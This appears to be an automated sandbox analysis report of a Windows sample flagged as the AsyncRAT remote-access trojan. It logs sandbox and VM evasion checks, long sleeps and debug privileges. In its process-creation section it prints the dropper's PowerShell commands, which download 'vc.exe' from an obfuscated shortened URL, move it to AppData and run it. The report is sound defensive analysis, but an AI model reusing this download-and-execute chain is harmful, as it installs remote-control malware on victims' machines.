Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AsyncRAT

Source: Yara match	File source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vc.exe PID: 4896, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vc.exe, 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vc.exe, 00000020.00000002.529207306.0000000003B41000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLLHEAD

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\vc.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\o.exe	Window / User API: threadDelayed 891			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Window / User API: threadDelayed 809			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Window / User API: threadDelayed 1424			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Window / User API: threadDelayed 460			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Window / User API: threadDelayed 1335
Source: C:\Users\user\AppData\Local\Temp\o.exe	Window / User API: threadDelayed 422

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6132	Thread sleep count: 891 > 30			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2044	Thread sleep count: 809 > 30			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 1872	Thread sleep time: -3689348814741908s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2124	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6740	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2220	Thread sleep count: 1424 > 30			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6136	Thread sleep count: 460 > 30			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 1264	Thread sleep time: -2767011611056431s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6732	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6664	Thread sleep count: 1335 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6620	Thread sleep count: 422 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6128	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6128	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 4276	Thread sleep count: 93 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6968	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\vc.exe TID: 3216	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_0125C197 malloc,ExpandEnvironmentStringsW,FindFirstFileW,FindClose,free,

14_2_0125C197

Enumerates the file system

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\powershell.exe			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: o.exe, 00000010.00000002.397800415.000000000565B000.00000004.00000001.sdmp, o.exe, 00000011.00000002.423626227.0000000004AA7000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: vc.exe, 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp, o.exe, 00000010.00000002.397427961.0000000005592000.00000004.00000001.sdmp, o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmp	Binary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: vc.exe, 00000020.00000002.534814534.0000000007661000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: vc.exe, 00000020.00000002.534536689.00000000075C0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWH
Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Queries a list of all running processes

Source: C:\Users\user\AppData\Local\Temp\o.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\o.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\vc.exe	Process token adjusted: Debug

Contains functionality to register its own exception handler

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_01259E90 SetUnhandledExceptionFilter,		14_2_01259E90
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_01259BEC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		14_2_01259BEC

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\AppData\Local\Temp\o.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe

May try to detect the Windows Explorer process (often used for injection)

Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: GetLocaleInfoW,wcsncmp,

14_2_0125D111

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
